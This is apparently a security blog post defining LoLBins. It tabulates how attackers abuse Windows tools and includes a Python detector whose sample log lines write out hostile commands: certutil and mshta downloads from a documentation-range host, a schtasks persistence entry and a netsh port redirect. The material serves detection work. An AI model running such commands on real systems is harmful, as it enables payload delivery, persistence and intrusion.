What are LoLBins? Here’s a Full List of LoLBins used in Living-Off-The-Land LoTL Attacks

The SOC Labs Team 4 December 2024

So you want to know what LoLBins are? You’re in the right place. Here’s an expanded table of LoLBin tools and how they are used in Living-off-the-Land (LoTL) attacks.

What are LoLBins?

LoLBins is the abbreviated term for Living Off the Land Binaries. Living Off the Land Binaries are legitimate, non-malicious binaries that ship with or are native to the operating system, which cyber criminals and crime groups use and abuse to camouflage their malicious activity as normal system operation.

List of LoLBins Used By Cybercriminals in Cyber Attacks

| LoLBin | How Cyber Criminals Use The Tool to Perform LoTL Attacks |
|---|---|
| PowerShell | Used for downloading and executing malicious scripts, fileless malware execution, reconnaissance, and data exfiltration, often bypassing traditional antivirus defenses |
| certutil | Abused to download malicious files, decode Base64-encoded payloads, and as a simple data exfiltration tool by copying data to a remote server |
| mshta | Executes malicious JavaScript or VBScript hosted remotely or locally, allowing attackers to execute code within the user’s context without raising suspicion |
| wmic | Used for remote code execution, reconnaissance, and lateral movement by running commands on remote systems, often bypassing security controls |
| rundll32 | Executes DLL files and scripts, allowing attackers to run malicious code or scripts without dropping an executable on disk, aiding in evasion of antivirus |
| regsvr32 | Utilized to execute malicious scripts or COM objects via .sct files, aiding in fileless attacks and bypassing application whitelisting |
| schtasks | Creates or modifies scheduled tasks for persistence, enabling attackers to execute malicious code at specified times or after system reboots |
| bitsadmin | Abused to download files or execute commands, often used to download malicious payloads stealthily from the internet or an intranet server |
| at | Similar to `schtasks`, used to schedule tasks for executing malicious commands, particularly on older systems where `schtasks` is unavailable |
| cmd.exe | The command prompt itself can be used for executing malicious scripts and commands and facilitating various types of attacks while blending in with normal operations |
| msiexec | Exploited to download and execute malicious MSI packages or scripts, allowing attackers to deliver payloads and execute them silently without dropping an executable |
| conhost | Used in conjunction with other tools like PowerShell to hide the command prompt window when running malicious commands, helping avoid detection |
| netsh | Abused to create firewall exceptions, set up network redirections, or configure proxy settings to bypass network security controls and exfiltrate data through network tunneling |
| taskkill | Used to terminate security-related processes or services, enabling attackers to disable security defenses during an attack, thereby avoiding detection or interruption |
| bginfo | Abused to execute arbitrary commands while displaying system information, used to run malicious code disguised as part of legitimate system management tasks, often as part of a larger attack chain |
| mavinject | Injects code into running processes, which can be used for stealthy execution of malicious code within trusted processes, bypassing security software |
| msdt | Windows troubleshooting utility that can be used to execute PowerShell commands or scripts by exploiting vulnerabilities like Follina, allowing attackers to run code remotely with minimal detection |
| cscript | Executes VBScript and JScript files, often used to run malicious scripts as part of fileless attacks or in conjunction with other LoLBins like `mshta` or `regsvr32`, enabling attackers to execute code without dropping files on disk |
| wscript | Similar to `cscript`, used for executing malicious scripts, often as part of phishing campaigns or lateral movement techniques within a compromised network |
| sc.exe | Used to create, configure, or start/stop services, enabling attackers to create malicious services for persistence or to run malicious code with system privileges, which can be particularly dangerous if the service runs as a privileged user |
| whoami | Used by attackers to enumerate user permissions, privileges, and group memberships, aiding in privilege escalation and lateral movement within a compromised network |
| reg.exe | Used to manipulate the Windows Registry, allowing attackers to establish persistence, disable security features, or execute malicious payloads upon system reboot or user login |
| findstr | Abused to search for sensitive information within files, such as passwords or tokens, which can then be exfiltrated by the attacker for further exploitation or lateral movement |
| cacls | Abused to modify file permissions, allowing attackers to escalate privileges or lock legitimate users out of files, potentially leading to further compromise or denial of service attacks |
| net.exe | Exploited to enumerate users, groups, shares, and sessions within a network, as well as to add users or modify group memberships, often as part of lateral movement or privilege escalation strategies |
| wmiprvse.exe | Used by attackers to execute WMI (Windows Management Instrumentation) commands for system reconnaissance, process creation, or remote command execution, often without leaving traces that would trigger traditional detection mechanisms |
| nltest | Abused to query domain information, identify domain controllers, and test trust relationships, which can be leveraged by attackers to facilitate lateral movement and further network compromise, particularly in Active Directory environments |
| powershell_ise | Used similarly to PowerShell but in an integrated scripting environment, which can provide a more stealthy means of script execution and testing by attackers within compromised environments, often bypassing detection mechanisms focused on standard PowerShell activity |
| esentutl | A database utility used to extract and manipulate data from database files, which can be exploited to access sensitive information or to establish persistence by modifying the database or recovering data from deleted files that may contain valuable information for attackers |
| forfiles | Abused to execute commands on a collection of files, often used by attackers for mass data exfiltration or modification, enabling them to operate on multiple files simultaneously without triggering alerts, particularly in automated environments where such operations may go unnoticed |
| expand.exe | A tool used to extract files from compressed CAB files, which can be exploited by attackers to deploy malware hidden within such archives, enabling the installation of malicious software that might bypass basic signature-based detection mechanisms |
| clip.exe | Used to redirect command output to the clipboard, which can be leveraged by attackers to silently steal sensitive information from command-line outputs without leaving obvious traces, enabling exfiltration of critical data in a stealthy manner |
| makecab.exe | Used to create CAB files from a set of files, which can be exploited by attackers to compress and package malware or sensitive data for exfiltration, often bypassing basic data loss prevention (DLP) mechanisms due to the use of a legitimate and commonly whitelisted utility |

This expanded table includes a wide array of LoLBins that attackers can exploit for various stages of an attack, from initial compromise to lateral movement, persistence, and data exfiltration. These tools are favored because they blend in with normal system activity, making detection more challenging for traditional security measures.
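Because these binaries are legitimate, detection has to key on how they are invoked rather than on the image name alone. The script below is an added example (not code from The SOC Labs) that pairs several LoLBins from the table with command-line and parent-process indicators and runs them over constructed process-creation log lines; the log format, rule patterns and sample values are all assumptions made for the demonstration.

```python
import re

# One rule per LoLBin from the table above: image name, a command-line
# pattern for the abuse the table describes, and a label. The patterns
# are illustrative starting points; tune them against your own baseline.
RULES = [
    ("certutil.exe", r"-urlcache|-decode", "remote download / Base64 decode"),
    ("mshta.exe", r"https?://|javascript:|vbscript:", "remote or inline script"),
    ("regsvr32.exe", r"/i:https?://|scrobj\.dll", "COM scriptlet (.sct) execution"),
    ("rundll32.exe", r"javascript:|https?://", "script run without a dropped exe"),
    ("bitsadmin.exe", r"/transfer|/addfile", "stealthy file download"),
    ("netsh.exe", r"advfirewall.*add\s+rule|portproxy", "firewall hole / port redirect"),
    ("schtasks.exe", r"/create", "scheduled-task persistence (noisy: tune)"),
    ("sc.exe", r"\bcreate\b|binpath=", "service creation for persistence"),
]
# Office and script hosts spawning any LoLBin is suspicious by itself.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe"}

# Constructed log format: "<ts> <host> <parent> -> <image> | <command line>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) -> (\S+) \| (.*)$")

def analyse(line):
    """Return a finding dict for a suspicious line, or None if benign/unparsed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, host, parent, image, cmdline = m.groups()
    reasons = [abuse for binary, pattern, abuse in RULES
               if image.lower() == binary and re.search(pattern, cmdline, re.I)]
    if parent.lower() in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    if not reasons:
        return None
    return {"ts": ts, "host": host, "image": image, "reasons": reasons}

def scan(log_text):
    """Run analyse() over every line and keep only the findings."""
    return [f for f in map(analyse, log_text.splitlines()) if f]

# Constructed sample telemetry (203.0.113.0/24 is a documentation range).
SAMPLE_LOG = """\
2024-12-04T10:01:02Z WS01 explorer.exe -> certutil.exe | certutil -urlcache -split -f http://203.0.113.5/x.txt
2024-12-04T10:01:09Z WS01 cmd.exe -> certutil.exe | certutil -hashfile C:\\Windows\\notepad.exe SHA256
2024-12-04T10:02:15Z WS01 winword.exe -> mshta.exe | mshta http://203.0.113.5/a.hta
2024-12-04T10:03:30Z WS01 cmd.exe -> schtasks.exe | schtasks /create /sc onlogon /tn Updater /tr C:\\Users\\Public\\u.exe
2024-12-04T10:04:01Z WS01 services.exe -> svchost.exe | svchost.exe -k netsvcs
2024-12-04T10:05:12Z WS01 cmd.exe -> netsh.exe | netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5
"""
```

Calling `scan(SAMPLE_LOG)` flags four of the six lines; the benign `certutil -hashfile` and `svchost` entries pass, and the `mshta` line carries two reasons because both its arguments and its Office parent match.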

Protective Measures While Combating LoLBins

Combating LoLBins is literally fist fighting with notorious cyber threat actors. If you’re not careful, you may end up in a disaster. Staying protected is key before taking down adversaries. It is always recommended to use a VPN service like NordVPN, Surfshark, or PureVPN and security solutions like Panda Security or Malwarebytes while performing the analysis to stay protected.



Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The SOC Labs assumes no liability for the accuracy or consequences of using this information.
